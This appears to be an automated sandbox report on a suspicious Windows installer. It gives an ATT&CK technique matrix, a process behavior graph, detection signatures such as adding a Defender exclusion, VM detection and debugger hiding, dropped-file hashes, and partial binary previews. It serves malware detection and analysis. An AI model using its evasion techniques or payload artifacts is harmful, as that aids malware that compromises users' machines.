Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E9AB2A GetSystemTimeAsFileTime,10_2_00E9AB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00F30090 GetVersion,10_2_00F30090
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter
1
Windows Service
1
Access Token Manipulation
11
Masquerading
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts1
Service Execution
1
DLL Side-Loading
1
Windows Service
1
Disable or Modify Tools
LSASS Memory321
Security Software Discovery
Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Native API
Logon Script (Windows)111
Process Injection
231
Virtualization/Sandbox Evasion
Security Account Manager231
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
DLL Side-Loading
1
Access Token Manipulation
NTDS2
Process Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
Process Injection
LSA Secrets1
Application Window Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Deobfuscate/Decode Files or Information
Cached Domain Credentials2
System Owner/User Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
Obfuscated Files or Information
DCSync3
File and Directory Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Software Packing
Proc Filesystem25
System Information Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
DLL Side-Loading
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1579802 Sample: #U5b89#U88c5#U52a9#U624b1.0.2.exe Startdate: 23/12/2024 Architecture: WINDOWS Score: 80 90 Found driver which could be used to inject code into processes 2->90 92 PE file contains section with special chars 2->92 94 AI detected suspicious sample 2->94 96 Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet 2->96 10 #U5b89#U88c5#U52a9#U624b1.0.2.exe 2 2->10         started        13 cmd.exe 2->13         started        15 cmd.exe 2->15         started        17 31 other processes 2->17 process3 file4 86 C:\...\#U5b89#U88c5#U52a9#U624b1.0.2.tmp, PE32 10->86 dropped 19 #U5b89#U88c5#U52a9#U624b1.0.2.tmp 3 5 10->19         started        23 sc.exe 1 13->23         started        25 sc.exe 1 15->25         started        27 sc.exe 1 17->27         started        29 sc.exe 1 17->29         started        31 sc.exe 1 17->31         started        33 27 other processes 17->33 process5 file6 72 C:\Users\user\AppData\Local\...\update.vac, PE32 19->72 dropped 74 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 19->74 dropped 98 Adds a directory exclusion to Windows Defender 19->98 35 #U5b89#U88c5#U52a9#U624b1.0.2.exe 2 19->35         started        38 powershell.exe 23 19->38         started        41 conhost.exe 23->41         started        43 conhost.exe 25->43         started        45 conhost.exe 27->45         started        47 conhost.exe 29->47         started        49 conhost.exe 31->49         started        51 conhost.exe 33->51         started        53 26 other processes 33->53 signatures7 process8 file9 76 C:\...\#U5b89#U88c5#U52a9#U624b1.0.2.tmp, PE32 35->76 dropped 55 #U5b89#U88c5#U52a9#U624b1.0.2.tmp 4 16 35->55         started        100 Loading BitLocker PowerShell Module 38->100 59 conhost.exe 38->59         started        61 WmiPrvSE.exe 38->61         started        signatures10 process11 file12 78 C:\Users\user\AppData\Local\...\update.vac, PE32 55->78 dropped 80 C:\Program Files (x86)\...\trash (copy), PE32+ 55->80 dropped 82 C:\Program Files (x86)\...\is-EIO1L.tmp, PE32+ 55->82 dropped 84 3 other files (1 malicious) 55->84 dropped 102 Query firmware table information (likely to detect VMs) 55->102 104 Protects its processes via BreakOnTermination flag 55->104 106 Hides threads from debuggers 55->106 108 Contains functionality to hide a thread from the debugger 55->108 63 7zr.exe 2 55->63         started        66 7zr.exe 6 55->66         started        signatures13 process14 file15 88 C:\Program Files (x86)\...\tProtect.dll, PE32+ 63->88 dropped 68 conhost.exe 63->68         started        70 conhost.exe 66->70         started        process16

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
#U5b89#U88c5#U52a9#U624b1.0.2.exe0%ReversingLabs
SourceDetectionScannerLabelLink
C:\Program Files (x86)\Windows NT\7zr.exe0%ReversingLabs
C:\Program Files (x86)\Windows NT\hrsw.vbc11%ReversingLabs
C:\Program Files (x86)\Windows NT\is-EIO1L.tmp0%ReversingLabs
C:\Program Files (x86)\Windows NT\tProtect.dll9%ReversingLabs
C:\Program Files (x86)\Windows NT\trash (copy)0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-HSL06.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-HSL06.tmp\update.vac11%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-VBCHJ.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-VBCHJ.tmp\update.vac11%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
https://aria2.github.io/Usage:#U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.2318621011.0000000004679000.00000004.00001000.00020000.00000000.sdmp, is-EIO1L.tmp.6.drfalse
    high
    https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU#U5b89#U88c5#U52a9#U624b1.0.2.exefalse
      high
      https://github.com/aria2/aria2/issuesReport#U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.2318621011.0000000004679000.00000004.00001000.00020000.00000000.sdmp, is-EIO1L.tmp.6.drfalse
        high
        http://www.metalinker.org/#U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.2318621011.0000000004679000.00000004.00001000.00020000.00000000.sdmp, is-EIO1L.tmp.6.drfalse
          high
          https://www.remobjects.com/ps#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.2126523988.0000000002FC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.2126982219.000000007EF1B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000002.00000000.2129128970.0000000000491000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000000.2150311602.0000000000DAD000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp.0.dr, #U5b89#U88c5#U52a9#U624b1.0.2.tmp.5.drfalse
            high
            https://aria2.github.io/#U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.2318621011.0000000004679000.00000004.00001000.00020000.00000000.sdmp, is-EIO1L.tmp.6.drfalse
              high
              https://github.com/aria2/aria2/issues#U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.2318621011.0000000004679000.00000004.00001000.00020000.00000000.sdmp, is-EIO1L.tmp.6.drfalse
                high
                https://www.innosetup.com/#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.2126523988.0000000002FC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.2126982219.000000007EF1B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000002.00000000.2129128970.0000000000491000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000000.2150311602.0000000000DAD000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp.0.dr, #U5b89#U88c5#U52a9#U624b1.0.2.tmp.5.drfalse
                  high
                  http://www.metalinker.org/basic_string::_M_construct#U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.2318621011.0000000004679000.00000004.00001000.00020000.00000000.sdmp, is-EIO1L.tmp.6.drfalse
                    high
                    No contacted IP infos
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1579802
                    Start date and time:2024-12-23 09:23:17 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 8m 58s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:110
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Critical Process Termination
                    Sample name:#U5b89#U88c5#U52a9#U624b1.0.2.exe
                    renamed because original name is a hash value
                    Original Sample Name:1.0.2.exe
                    Detection:MAL
                    Classification:mal80.evad.winEXE@135/32@0/0
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 76%
                    • Number of executed functions: 28
                    • Number of non-executed functions: 75
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe
                    • Excluded IPs from analysis (whitelisted): 13.107.246.63, 172.202.163.200
                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: #U5b89#U88c5#U52a9#U624b1.0.2.exe
                    TimeTypeDescription
                    03:24:09API Interceptor1x Sleep call for process: #U5b89#U88c5#U52a9#U624b1.0.2.tmp modified
                    03:24:12API Interceptor29x Sleep call for process: powershell.exe modified
                    No context
                    No context
                    No context
                    No context
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    C:\Program Files (x86)\Windows NT\7zr.exe#U5b89#U88c5#U52a9#U624b_2.0.8.exeGet hashmaliciousUnknownBrowse
                      #U5b89#U88c5#U52a9#U624b_2.0.6.exeGet hashmaliciousUnknownBrowse
                        #U5b89#U88c5#U52a9#U624b_2.0.6.exeGet hashmaliciousUnknownBrowse
                          #U5b89#U88c5#U52a9#U624b_2.0.7.exeGet hashmaliciousUnknownBrowse
                            #U5b89#U88c5#U52a9#U624b_2.0.7.exeGet hashmaliciousUnknownBrowse
                              #U5b89#U88c5#U52a9#U624b_2.0.5.exeGet hashmaliciousUnknownBrowse
                                #U5b89#U88c5#U52a9#U624b_2.0.4.exeGet hashmaliciousUnknownBrowse
                                  #U5b89#U88c5#U52a9#U624b_2.0.5.exeGet hashmaliciousUnknownBrowse
                                    #U5b89#U88c5#U52a9#U624b_2.0.4.exeGet hashmaliciousUnknownBrowse
                                      Zt43pLXYiu.exeGet hashmaliciousUnknownBrowse
                                        Process:C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):831200
                                        Entropy (8bit):6.671005303304742
                                        Encrypted:false
                                        SSDEEP:24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
                                        MD5:84DC4B92D860E8AEA55D12B1E87EA108
                                        SHA1:56074A031A81A2394770D4DA98AC01D99EC77AAD
                                        SHA-256:BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
                                        SHA-512:CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
                                        Malicious:false
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Joe Sandbox View:
                                        • Filename: #U5b89#U88c5#U52a9#U624b_2.0.8.exe, Detection: malicious, Browse
                                        • Filename: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, Detection: malicious, Browse
                                        • Filename: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, Detection: malicious, Browse
                                        • Filename: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, Detection: malicious, Browse
                                        • Filename: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, Detection: malicious, Browse
                                        • Filename: #U5b89#U88c5#U52a9#U624b_2.0.5.exe, Detection: malicious, Browse
                                        • Filename: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, Detection: malicious, Browse
                                        • Filename: #U5b89#U88c5#U52a9#U624b_2.0.5.exe, Detection: malicious, Browse
                                        • Filename: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, Detection: malicious, Browse
                                        • Filename: Zt43pLXYiu.exe, Detection: malicious, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9A..} ..} ..} ...<... ...?..~ ...<..t ...?..v ...?... ...(.| ..} ... ...(.t ..K.... ..k_..~ ..K...~ ..f."._ ...R..x ...&..| ..Rich} ..........PE..L....\.d.....................N......:.............@..........................@............@.....................................x........................&.......d......................................................H............................text.............................. ..`.rdata..RZ.......\..................@..@.data...ds... ......................@....sxdata.............................@....rsrc...............................@..@.reloc..2r.......t..................@..B................................................................................................................................................................................................................................................
                                        Process:C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):249984
                                        Entropy (8bit):7.999190724188688
                                        Encrypted:true
                                        SSDEEP:6144:XiH33/Xofh9jGU9Xfxc+fezUh4buMTPKOM+3Hj:XGPonZ5G49MTyoHj
                                        MD5:07861A39CF1633A3AE529B0AE04C40E1
                                        SHA1:3B44EFE0BEB2F5CB2F66BBC61DE5B30FDCDE5A47
                                        SHA-256:F693C2A4124E1E7A072F6FA826D86BFCB2C2D46C584F57107B993355919EAD65
                                        SHA-512:65865B81EA2EBA946416238F93989999B9B07326A3B7A62B72CD7C4498880E4E8C482A5B315F918407A81CCFED4BAEB26F2DAA93B96D97113C7EDBB067FB10C7
                                        Malicious:false
                                        Preview:.@S....g %..,.................8..=....JO. G.2.^...:...1O....bQs.Do.cv...I.&.<&.R...nN.....m..&)}uC.=:......u.{.w^2..%..h.wQ..z.".8X.hp..j......Z.LT.Q..X1m.W..........]...F..@..M....0..i..S.I/..f...Q.A..|~.....a.z.5.$.Y,c.^.T./..5.....9+..-...R]..|.l....h..(.....Wg..2.|.._.s.....A...D..j.+...s.E..2.u..."s...v..4...d\bdm_..ag.......Y....X...........JcWPXd@..400...LTO.#.....W.......{..?.i........... 6>;d..)..x......0..]_R..)F...R.@Y....\m.[.....G.x:H.e......3}qu..y......c.s.&!.X..e?..J....F.A..C.i.#-..."Rx.......$3>..n...@.....],@....C.Rz.V.r......8h....t+O?.?... L......T..J.e.T....."..a_..%...l....q..fq....1...V......[..O..`..?.%,:..`\.{..Uws.J3...V.1.:.e..W..e..26.....{.."k.;.Hqv..b.US...^v.M.U...<..@...I[....Hf..j..5.o..f@.6.......0.3......1l....,C....;...N.N+q.>...a.|.UL..a....(. &...W..L@.Mg.RD.4.!..d3.Q.u...z.z.f..[....?K...;...@.A(la.e......w..ct"6.B+........#.....ZMh..^"j...c.g)Y9A.e`......x{.PoT..I........5...^...T/..N..-......
                                        Process:C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):3598848
                                        Entropy (8bit):7.004949099807939
                                        Encrypted:false
                                        SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                                        MD5:1D1464C73252978A58AC925ECE57F0FB
                                        SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                                        SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                                        SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 11%
                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
                                        Process:C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):249984
                                        Entropy (8bit):7.999190724188688
                                        Encrypted:true
                                        SSDEEP:6144:XiH33/Xofh9jGU9Xfxc+fezUh4buMTPKOM+3Hj:XGPonZ5G49MTyoHj
                                        MD5:07861A39CF1633A3AE529B0AE04C40E1
                                        SHA1:3B44EFE0BEB2F5CB2F66BBC61DE5B30FDCDE5A47
                                        SHA-256:F693C2A4124E1E7A072F6FA826D86BFCB2C2D46C584F57107B993355919EAD65
                                        SHA-512:65865B81EA2EBA946416238F93989999B9B07326A3B7A62B72CD7C4498880E4E8C482A5B315F918407A81CCFED4BAEB26F2DAA93B96D97113C7EDBB067FB10C7
                                        Malicious:false
                                        Preview:.@S....g %..,.................8..=....JO. G.2.^...:...1O....bQs.Do.cv...I.&.<&.R...nN.....m..&)}uC.=:......u.{.w^2..%..h.wQ..z.".8X.hp..j......Z.LT.Q..X1m.W..........]...F..@..M....0..i..S.I/..f...Q.A..|~.....a.z.5.$.Y,c.^.T./..5.....9+..-...R]..|.l....h..(.....Wg..2.|.._.s.....A...D..j.+...s.E..2.u..."s...v..4...d\bdm_..ag.......Y....X...........JcWPXd@..400...LTO.#.....W.......{..?.i........... 6>;d..)..x......0..]_R..)F...R.@Y....\m.[.....G.x:H.e......3}qu..y......c.s.&!.X..e?..J....F.A..C.i.#-..."Rx.......$3>..n...@.....],@....C.Rz.V.r......8h....t+O?.?... L......T..J.e.T....."..a_..%...l....q..fq....1...V......[..O..`..?.%,:..`\.{..Uws.J3...V.1.:.e..W..e..26.....{.."k.;.Hqv..b.US...^v.M.U...<..@...I[....Hf..j..5.o..f@.6.......0.3......1l....,C....;...N.N+q.>...a.|.UL..a....(. &...W..L@.Mg.RD.4.!..d3.Q.u...z.z.f..[....?K...;...@.A(la.e......w..ct"6.B+........#.....ZMh..^"j...c.g)Y9A.e`......x{.PoT..I........5...^...T/..N..-......
                                        Process:C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                                        File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                        Category:dropped
                                        Size (bytes):5649408
                                        Entropy (8bit):6.392614480390128
                                        Encrypted:false
                                        SSDEEP:98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
                                        MD5:8C71B86BF407C05BAF11E8D296B9C8B8
                                        SHA1:6624AB8CA883C48F02C58250D4EEE9E90098F4E4
                                        SHA-256:BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
                                        SHA-512:BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................&.ZF..0V..<.............@..............................V.....L.V...`... ...............................................V../...........0O..............`V.\a...........................vL.(.....................V..............................text....XF......ZF.................`..`.data....z...pF..|...^F.............@....rdata.. 9....F..:....F.............@..@.pdata.......0O.......O.............@..@.xdata........Q.......Q.............@..@.bss.....;....U..........................idata.../....V..0....U.............@....CRT....h....@V.......U.............@....tls.........PV.......U.............@....reloc..\a...`V..b....U.............@..B................................................................................................................................................................................................................
                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):56546
                                        Entropy (8bit):7.996401713517506
                                        Encrypted:true
                                        SSDEEP:1536:oGFeM+b/z9Q8Hf+hyC3oOOlOvsVq8iE7V4JDoyaNjHVG+:oG0jb/x3+hyUZGVniVJMtNjHw+
                                        MD5:5C87B157659C2E106E0B4688CAB6B416
                                        SHA1:0CD17EA860DB582A8103011DBAAF6A7C5D67D4A8
                                        SHA-256:3E1EEF1D48BCBB503CBB7F85711E09BF49589681192F57B4A28087AAD03F6D34
                                        SHA-512:4DDA59F57C2E2B5495512C937D6F8647BE5C2FE2D194EBE136CF3F33CD4EEBB49449F1771EF3F663BB3C3A2D1B60E0FD631A3DAD892EF8E7DAEFAE5750712AC3
                                        Malicious:false
                                        Preview:.@S.......l .................>..."s:Q.....^0.g]{...l.#..".Q,....zJ....i..../..B..B...,.....p..q.*>L_......Qo...~.R."..n(\t..Ui...k.w...@:.=0.W.4?;..4.....7....o3D.'Y.N[+....Ko..PT'..P........3...Z....D]YeAO/W).l'..W..W..V.a...U..W.O....v.....z.#...:..;.L.......v.......m.......h.S{....zgZ.A+.4".d+.Hl.<%....].J.s......7..G.f..T...S.W..}).w....$~.<"...>.]^C....=..gH(...j...}..$...'..6.T.g.g!..{B..l.L...%$..~...~.]Z....[n}^.A....#<...FG.L.....v.(..S ..A..{K.,.N....b..$...Nu$.....t.F......0....."..j5....u.l.>.......E[t!s.7*kpT.,%..*7..}{.?.....1)..Uq1\.:RI.?f...Z..?p.U...<.6I.z...7Qh..`.I...<9.!.s..........f..j[....[9R......&.=...q.....b.p.C3.!#.-..V/...[i..KC.F..y.0.OA..I5.G@......B..D...........V..,h.s.3V.Z.u......l....=..e....C...F.......a_."..[...3.......l....X#.M4..ff%c.R...R....g....... o.....o.).m..H.?&.E.IZ..].}..\..`8Z8....K..w.Kh.9.e=..8.#.2Y.(..C/T^.qbQ....=?@.3.H-..{6a.....k_s...G.hJg...~.>......c..ID.K5i.9gZCs. ...Yu....Z..SpE.h.Y)..
                                        Process:C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                                        File Type:7-zip archive data, version 0.4
                                        Category:dropped
                                        Size (bytes):56546
                                        Entropy (8bit):7.996401713517511
                                        Encrypted:true
                                        SSDEEP:1536:+UTRNG5MRWNsq6QcNR0NneqYoKk+1Bab+XUw1lSgWR:+FiafNPYrXBab+Ew1lSgs
                                        MD5:265DFDCCB7A5E843EA2BC63C6BC157DB
                                        SHA1:CE98E0CDB8ADA1BA19E298F5A3B92920A63C96A9
                                        SHA-256:4834855102AA4F56AFC332909712FA54A4FE1EC74D34F97B1EABDACF1D21EF53
                                        SHA-512:0D84C6185097FB3C2035E1721C60EEBDD7FF6435A726AA0B20B57D8C7385883D2A2AF3B12EF6D6FD1B71F82D47EF02CECC7FAD1C1045DE1254F240F9F943E287
                                        Malicious:false
                                        Preview:7z..'...h.+e........2........0...1...$|.!:.......7Ga...$`....X..!..7P.]n.yWko.D..*.)...~z.P%...9...#P.J..x..%tB.,.K.F....Np..;.s....dbvG..+........h0..<-Z'%.YY....S.....`.I}..y..3W|..W.J.....2dS..............r..K.ws.ka.2."?vY...w.i.L..0na&..d.7.V.R.......uK.a0.`..3..l...U/".\..Je..Rv.U%...Y........c......H..._.....M....w..y..v..W|P..B.Y.....9..j....&G2..'...9.'7.bt...[ ....b..9...}l.rG.@.;...qE...&.d..vz..^.........U.......E.A.=.........S.y...a..+..x..&...8.X.^S.)..4.K.N...}.g#z..._8.}Mp..RDmV..{.....!.. ..b.B.w"............7...Z...s.../\f>.....$T....Yw..;B+Q....{.. .:.......$\..T..wC.. ..a.O....~.L..J..|..w&"t)..%....D...YDL..B.(2...U..R....YD..RD!..=<..+.9~4.0......U...E>.=.B./Df..9..(.U.mRK8..G`.;.....!..n.Q.>.,.,..hw.Tqq8r..Oa.w.. i[.......2._E..C..WZ...6.H{..=...h...|..|/y.|l.G.h4'#=A...Sh.P.|.G..=.~...._..@*r.p.=.......]....N.#..a.w..Ix.Q......B...%...6/......@...S....8(sD...}x.E."...I...2.(......r..m..:....v.Zb~...d_x...........U)
                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):56546
                                        Entropy (8bit):7.996966859255975
                                        Encrypted:true
                                        SSDEEP:1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
                                        MD5:CEA69F993E1CE0FB945A98BF37A66546
                                        SHA1:7114365265F041DA904574D1F5876544506F89BA
                                        SHA-256:E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
                                        SHA-512:4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
                                        Malicious:false
